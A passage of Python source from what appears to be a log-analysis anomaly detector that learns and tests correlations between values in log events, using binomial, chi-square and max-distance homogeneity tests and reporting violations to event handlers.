self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 0} new_j_vals.append(j_val) elif j_val in self.rel_list[event_index][pos_var_cor_index][1] and i_val not in self.rel_list[event_index][ pos_var_cor_index][1][j_val]: if not self.generate_rules[event_index] or j_val not in new_j_vals: sorted_log_lines.append( "New value occurred in correlation of the paths %s = %s -> %s = old value: %s / New appeared value: %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(list(self.rel_list[event_index][ pos_var_cor_index][1][j_val].keys())[0]), repr(i_val))) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) change = {"OldValue": repr(list(self.rel_list[event_index][pos_var_cor_index][1][j_val].keys())[0]), "NewValue": repr(i_val)} value_changes.append(change) del self.rel_list[event_index][pos_var_cor_index][1][j_val] confidence += 1 / total_correlations if self.generate_rules[event_index] and j_val not in failed_j_vals: failed_j_vals.append(j_val) # Update the appearance of the relations if (i_val in self.rel_list[event_index][pos_var_cor_index][0]) and (j_val in self.rel_list[event_index][ pos_var_cor_index][0][i_val]): self.rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 if (j_val in self.rel_list[event_index][pos_var_cor_index][1]) and (i_val in self.rel_list[event_index][ pos_var_cor_index][1][j_val]): self.rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 # Print the message if at least one correlation was violated if len(sorted_log_lines) != 0: event_data["AffectedLogAtomPaths"] = 
list(set(affected_log_atom_paths)) event_data["ValueChanges"] = value_changes event_data["TypeInfo"] = {"Confidence": confidence} for listener in self.anomaly_event_handlers: sorted_log_lines += [""]*(self.event_type_detector.total_records - len(sorted_log_lines)) listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) # Delete the rules which failed during the rule generation phase if self.generate_rules[event_index]: for i_val in failed_i_vals: if i_val in self.rel_list[event_index][pos_var_cor_index][0]: del self.rel_list[event_index][pos_var_cor_index][0][i_val] for j_val in failed_j_vals: if j_val in self.rel_list[event_index][pos_var_cor_index][1]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = self.log_atom.atom_time + self.stop_learning_no_anomaly_time else: # Only update the possible correlations which have been initialized and print warnings reported_values_ij = {} reported_values_ji = {} for k in range(-1, -self.num_update-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # A new value appeared, therefore append the new value to the list reported_values_ij if i_val in self.rel_list[event_index][pos_var_cor_index][0] and self.rel_list[event_index][pos_var_cor_index][0][ i_val] != {} and j_val not in self.rel_list[event_index][pos_var_cor_index][0][i_val]: if i_val not in reported_values_ij: reported_values_ij[i_val] = {j_val: 1} elif j_val in reported_values_ij[i_val]: reported_values_ij[i_val][j_val] += 1 else: reported_values_ij[i_val][j_val] = 1 # A new value appeared, therefore append the new value to the list reported_values_ji if j_val in 
self.rel_list[event_index][pos_var_cor_index][1] and self.rel_list[event_index][pos_var_cor_index][1][ j_val] != {} and i_val not in self.rel_list[event_index][pos_var_cor_index][1][j_val]: if j_val not in reported_values_ji: reported_values_ji[j_val] = {i_val: 1} elif i_val in reported_values_ji[j_val]: reported_values_ji[j_val][i_val] += 1 else: reported_values_ji[j_val][i_val] = 1 # Print the message of the reported values for i_val in reported_values_ij: message = "Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][pos_var_cor_val[ 1]]], list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[ 0], self.event_type_detector.total_records) confidence = (sum(reported_values_ij[i_val][j_val] for j_val in reported_values_ij[i_val]) / ( sum(reported_values_ij[i_val][j_val] for j_val in reported_values_ij[i_val]) + 1)) * ( len(reported_values_ij[i_val]) / (len(reported_values_ij[i_val]) + 1)) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_values.append(repr(i_val)) affected_values.append(list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[0]) event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedValues"] = affected_values event_data["TypeInfo"] = {"Confidence": confidence} sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in 
self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) # Print the message of the reported values for j_val in reported_values_ji: message = "Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][self.pos_var_cor[ event_index][pos_var_cor_index][0]]], list(self.rel_list[event_index][pos_var_cor_index][1][ j_val].keys())[0], self.event_type_detector.total_records) confidence = (sum(reported_values_ji[j_val][i_val] for i_val in reported_values_ji[j_val]) / ( sum(reported_values_ji[j_val][i_val] for i_val in reported_values_ji[j_val]) + 1)) * ( len(reported_values_ji[j_val]) / (len(reported_values_ji[j_val]) + 1)) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_values.append(repr(j_val)) affected_values.append(list(self.rel_list[event_index][pos_var_cor_index][1][j_val].keys())[0]) event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedValues"] = affected_values event_data["TypeInfo"] = {"Confidence": confidence} sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) def update_or_test_cor_w_rel(self, event_index): """Update or 
test the w_rel_list.""" # Initialise the lists for the BT results if necessary if len(self.w_rel_ht_results) < event_index + 1 or self.w_rel_ht_results[event_index] == []: self.w_rel_ht_results += [[] for i in range(event_index + 1 - len(self.w_rel_ht_results))] self.w_rel_ht_results[event_index] = [ [{i_val: [1] * self.num_bt for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, { j_val: [1]*self.num_bt for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] self.w_rel_confidences += [[] for i in range(event_index + 1 - len(self.w_rel_confidences))] self.w_rel_confidences[event_index] = [ [{i_val: [] for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]}, { j_val: [] for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] # Initialises the appearance list, as a copy of the w_rel_list with 0 instead of the CountIndices current_appearance_list = [ [{i_val: {j_val: 0 for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]} for i_val in self.w_rel_list[ event_index][pos_var_cor_index][0]}, {j_val: {i_val: 0 for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][ j_val]} for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]}] for pos_var_cor_index in range( len(self.pos_var_cor[event_index]))] # Counting the appearance of the cases in current_appearance_list for k in range(-1, -self.num_update-1, -1): # List of the values of discrete variables, in one log line vals = [self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] for i in range( len(self.discrete_indices[event_index]))] for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): # Count the appearances if the list is not empty or if new rules should be generated if current_appearance_list[pos_var_cor_index] != [{}, {}] or 
self.generate_rules[event_index]: i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices # Add the appearance of the line to the appearance list and adds new entries if self.generate_rules[event_index] # is set to True. if vals[i] in current_appearance_list[pos_var_cor_index][0]: if vals[j] in current_appearance_list[pos_var_cor_index][0][vals[i]]: current_appearance_list[pos_var_cor_index][0][vals[i]][vals[j]] += 1 else: current_appearance_list[pos_var_cor_index][0][vals[i]][vals[j]] = 1 elif self.generate_rules[event_index]: current_appearance_list[pos_var_cor_index][0][vals[i]] = {vals[j]: 1} if vals[j] in current_appearance_list[pos_var_cor_index][1]: if vals[i] in current_appearance_list[pos_var_cor_index][1][vals[j]]: current_appearance_list[pos_var_cor_index][1][vals[j]][vals[i]] += 1 else: current_appearance_list[pos_var_cor_index][1][vals[j]][vals[i]] = 1 elif self.generate_rules[event_index]: current_appearance_list[pos_var_cor_index][1][vals[j]] = {vals[i]: 1} if self.generate_rules[event_index]: # generates new rules or appends new values to existing rules for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # Only consider the possible correlations which have been initialized if current_appearance_list[pos_var_cor_index] != [{}, {}]: # Check correlations i=i_val -> j=j_val and decide if the rules should be deleted, extended or updated, # or if new rules should be generated for i_val in current_appearance_list[pos_var_cor_index][0]: if i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: # Check if new values have appeared, append them and reinitialize the lists tmp_bool = False for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: tmp_bool = True break # New values have appeared on the right side if tmp_bool: if 
self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][0][i_val].values(), len(self.pos_var_val[ event_index][j])): # Add new rules self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = sum(current_appearance_list[ pos_var_cor_index][0][i_val].values()) # Add the entries for j_val for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = current_appearance_list[ pos_var_cor_index][0][i_val][j_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val].append( 0.5 + 1 / len(current_appearance_list[pos_var_cor_index][0][i_val])) self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = self.w_rel_confidences[ event_index][pos_var_cor_index][0][i_val][-(self.num_bt-self.min_successes_bt+1):] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # No new values have appeared on the right side. 
Update the appearance of the relation else: # Check correlations i=i_val -> j=j_val # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if any(current_appearance_list[pos_var_cor_index][0][i_val][j_val] for j_val in current_appearance_list[ pos_var_cor_index][0][i_val]): tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][0][i_val], current_appearance_list[pos_var_cor_index][0][i_val], event_index, pos_var_cor_index, 0, i_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [1] for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += current_appearance_list[ pos_var_cor_index][0][i_val][j_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # i_val not in self.w_rel_list[event_index][pos_var_cor_index][0]. 
Therefore, test if the rule should be used else: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][0][i_val].values(), len(self.pos_var_val[ event_index][j])): self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = sum(current_appearance_list[ pos_var_cor_index][0][i_val].values()) self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = [] # Add the entries for j_val for j_val in current_appearance_list[pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = current_appearance_list[ pos_var_cor_index][0][i_val][j_val] # Check correlations j=j_val -> i=i_val and decide if the rules should be deleted, extended or updated, # or if new rules should be generated. for j_val in current_appearance_list[pos_var_cor_index][1]: if j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: # Check if new values have appeared, append them and reinitialize the lists tmp_bool = False for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: tmp_bool = True break # New values have appeared on the right side if tmp_bool: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][1][j_val].values(), len(self.pos_var_val[ event_index][i])): # Add new rules self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = sum(current_appearance_list[ pos_var_cor_index][1][j_val].values()) # Add the entries for i_val for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = 
self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val].append( 0.5 + 1 / len(current_appearance_list[pos_var_cor_index][1][j_val])) self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = self.w_rel_confidences[ event_index][pos_var_cor_index][0][i_val][-(self.num_bt-self.min_successes_bt+1):] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # No new values have appeared on the right side. Update the appearance of the relation else: # Check correlations i=i_val -> j=j_val # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if any(current_appearance_list[pos_var_cor_index][1][j_val][i_val] for i_val in current_appearance_list[ pos_var_cor_index][1][j_val]): tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][1][j_val], current_appearance_list[pos_var_cor_index][1][j_val], event_index, pos_var_cor_index, 1, j_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [1] for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del 
self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # j_val not in self.w_rel_list[event_index][pos_var_cor_index][1]. Therefore, test if the rule should be used else: if self.check_cor_w_rel(current_appearance_list[pos_var_cor_index][1][j_val].values(), len(self.pos_var_val[ event_index][i])): self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = sum(current_appearance_list[ pos_var_cor_index][1][j_val].values()) self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = [] # Add the entries for i_val for i_val in current_appearance_list[pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = current_appearance_list[ pos_var_cor_index][1][j_val][i_val] else: # Tests and updates the correlation rules for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): # Only consider the possible correlations which have been initialized if self.w_rel_list[event_index][pos_var_cor_index] != [{}, {}]: # Initialise the lists for the indices that failed the binomial test failed_i_vals = [] failed_j_vals = [] # Check correlations i=i_val -> j=j_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: # States True after the following steps if all tests were positive, and False if at least one was negative. 
tmp_bool = True if sum(current_appearance_list[pos_var_cor_index][0][i_val][j_val] for j_val in current_appearance_list[ pos_var_cor_index][0][i_val]) > self.min_values_cors_thres: tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][0][i_val], current_appearance_list[pos_var_cor_index][0][i_val], event_index, pos_var_cor_index, 0, i_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [1] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] failed_i_vals.append(i_val) # Check correlations j=j_val -> i=i_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if sum(current_appearance_list[pos_var_cor_index][1][j_val][i_val] for i_val in current_appearance_list[ pos_var_cor_index][1][j_val]) > self.min_values_cors_thres: tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][1][j_val], current_appearance_list[pos_var_cor_index][1][j_val], event_index, pos_var_cor_index, 1, j_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [1] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] failed_j_vals.append(j_val) if self.update_rules[event_index] and self.learn_mode: # Print if new values have appeared in the correlation rules message = f"New values appeared after the {self.event_type_detector.total_records}-th line in correlation(s) of " \ f"the event {self.event_type_detector.get_event_type(event_index)}" confidence = 0 total_correlations 
= len([None for _ in self.w_rel_list[event_index][pos_var_cor_index][0]]) + len( [None for _ in self.w_rel_list[event_index][pos_var_cor_index][1]]) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] distribution_changes = [] for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: if len(self.w_rel_list[event_index][pos_var_cor_index][0][i_val]) != len(current_appearance_list[ pos_var_cor_index][0][i_val]): if len(current_appearance_list[pos_var_cor_index][0][i_val]) / len(self.w_rel_list[event_index][ pos_var_cor_index][0][i_val]) >= self.new_vals_alarm_thres: sorted_log_lines.append( "Alarm: New value occurred in correlation of the paths %s = %s -> %s =" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]])) else: sorted_log_lines.append("New value occurred in correlation of the paths %s = %s -> %s =" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]])) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[1]]]) distribution = { "OldDistribution": [[j_val, self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] / sum( self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values())] for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val].keys()], "NewDistribution": [[j_val, current_appearance_list[pos_var_cor_index][0][i_val][j_val] / sum( 
current_appearance_list[pos_var_cor_index][0][i_val].values())] for j_val in current_appearance_list[pos_var_cor_index][0][i_val].keys()] } distribution_changes.append(distribution) sorted_log_lines.append(f"Old distribution: {distribution['OldDistribution']}") sorted_log_lines.append(f"New distribution: {distribution['NewDistribution']}") confidence += 1 / total_correlations # Add the new values to the correlation rule for j_val in current_appearance_list[pos_var_cor_index][0][i_val].keys(): if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = 0 for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: if len(self.w_rel_list[event_index][pos_var_cor_index][1][j_val]) != len(current_appearance_list[ pos_var_cor_index][1][j_val]): if len(current_appearance_list[pos_var_cor_index][1][j_val]) / len(self.w_rel_list[event_index][ pos_var_cor_index][1][j_val]) >= self.new_vals_alarm_thres: sorted_log_lines.append("Alarm: New value occurred in correlation of the paths %s = %s -> %s =" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]])) else: sorted_log_lines.append("New value occurred in correlation of the paths %s = %s -> %s =" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]])) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[0]]]) distribution = { 
"OldDistribution": [[i_val, self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] / sum( self.w_rel_list[event_index][pos_var_cor_index][1][j_val].values())] for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val].keys()], "NewDistribution": [[i_val, current_appearance_list[pos_var_cor_index][1][j_val][i_val] / sum( current_appearance_list[pos_var_cor_index][1][j_val].values())] for i_val in current_appearance_list[pos_var_cor_index][1][j_val].keys()] } distribution_changes.append(distribution) sorted_log_lines.append(f"Old distribution: {distribution['OldDistribution']}") sorted_log_lines.append(f"New distribution: {distribution['NewDistribution']}") confidence += 1 / total_correlations # Add the new values to the correlation rule for i_val in current_appearance_list[pos_var_cor_index][1][j_val].keys(): if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = 0 if len(sorted_log_lines) != 0: event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["DistributionChanges"] = distribution_changes event_data["TypeInfo"] = {"Confidence": confidence} sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) # Remove the failed rules if it is an update step # Binomial test and delete rules of the form i=i_val -> j=j_val for i_val in failed_i_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # Binomial test and delete rules of the form j=j_val -> i=i_val for j_val in failed_j_vals: if 
sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # Update the distributions of the correlation rules, which succeeded the test above # Update i=i_val -> j=j_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: if self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val][-1]: for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += current_appearance_list[ pos_var_cor_index][0][i_val][j_val] # Update j=j_val -> i=i_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: if self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val][-1]: for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += current_appearance_list[ pos_var_cor_index][1][j_val][i_val] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = self.log_atom.atom_time + self.stop_learning_no_anomaly_time else: # Print the rules, which failed the binomial test for i_val in failed_i_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_test(event_index, pos_var_cor_index, 0, i_val) self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = [] for j_val in failed_j_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_test(event_index, pos_var_cor_index, 1, j_val) self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = [1] * self.num_bt 
self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = []

    def homogeneity_test(self, occurrences1, occurrences2, event_index, pos_var_cor_index, cor_direction, value1):
        """Make a two sample test of homogeneity of the given occurrences.

        Both arguments are dicts mapping a value to its count; presumably the stored counts of the rule
        value1 -> ... and the counts of the current update window — confirm against the caller.
        Which test runs is selected by self.used_homogeneity_test: "Chi" performs a Pearson chi-square test on the
        2 x k contingency table (k = len(occurrences1)), "MaxDist" compares the relative frequency of every value.
        Any other value of used_homogeneity_test performs no test and reports the samples as homogeneous.
        @param event_index, pos_var_cor_index, cor_direction, value1 identify the rule whose confidence list
        self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1] receives the test statistic.
        @return True when the samples are considered homogeneous. False when the test fails; in that case the test
        statistic is appended to the rule's confidence list, which is trimmed to its last
        (num_bt - min_successes_bt + 1) entries.
        """
        if self.used_homogeneity_test == "Chi":
            test_result = 0
            for val in occurrences1:
                # Values without any recorded occurrence in the first sample do not contribute to the statistic.
                # NOTE(review): occurrences2[val] is looked up without a default, so every key of occurrences1 has to
                # be present in occurrences2 — confirm the caller guarantees this.
                if occurrences1[val] > 0:
                    observed1 = occurrences1[val]
                    # Expected count under homogeneity: row total times the pooled relative frequency of val.
                    expected1 = sum(occurrences1.values()) * (occurrences1[val]+occurrences2[val]) / \
                        (sum(occurrences1.values()) + sum(occurrences2.values()))
                    test_result += (observed1 - expected1) * (observed1 - expected1) / expected1
                    observed2 = occurrences2[val]
                    expected2 = sum(occurrences2.values()) * (occurrences1[val]+occurrences2[val]) / \
                        (sum(occurrences1.values()) + sum(occurrences2.values()))
                    # NOTE(review): expected2 is 0 whenever occurrences2 sums to 0, which raises ZeroDivisionError
                    # on the next line; the "MaxDist" branch guards the same case with max(1, ...) — confirm callers
                    # never pass an all-zero second sample to the "Chi" test.
                    test_result += (observed2 - expected2) * (observed2 - expected2) / expected2
            # Critical value at significance alpha_chisquare_test with k - 1 degrees of freedom.
            quantile = chi2.ppf(1-self.alpha_chisquare_test, (len(occurrences1)-1))
            if test_result >= quantile:
                self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1].append(test_result)
                # Keep only as many statistics as can still matter for the binomial test of this rule.
                self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1] = self.w_rel_confidences[
                    event_index][pos_var_cor_index][cor_direction][value1][-(self.num_bt-self.min_successes_bt+1):]
                return False
        elif self.used_homogeneity_test == "MaxDist":
            for val in occurrences1:
                # Reject as soon as one value's relative frequency differs by more than max_dist_rule_distr.
                # An all-zero second sample is treated as having relative frequency 0 (max(1, ...) avoids a division by 0).
                if abs(occurrences1[val] / sum(occurrences1.values()) - occurrences2[val] / max(1, sum(occurrences2.values()))) > self.max_dist_rule_distr:
                    self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1].append(abs(
                        occurrences1[val] / sum(occurrences1.values()) - occurrences2[val] / max(
                            1, sum(occurrences2.values()))))
                    self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1] = self.w_rel_confidences[
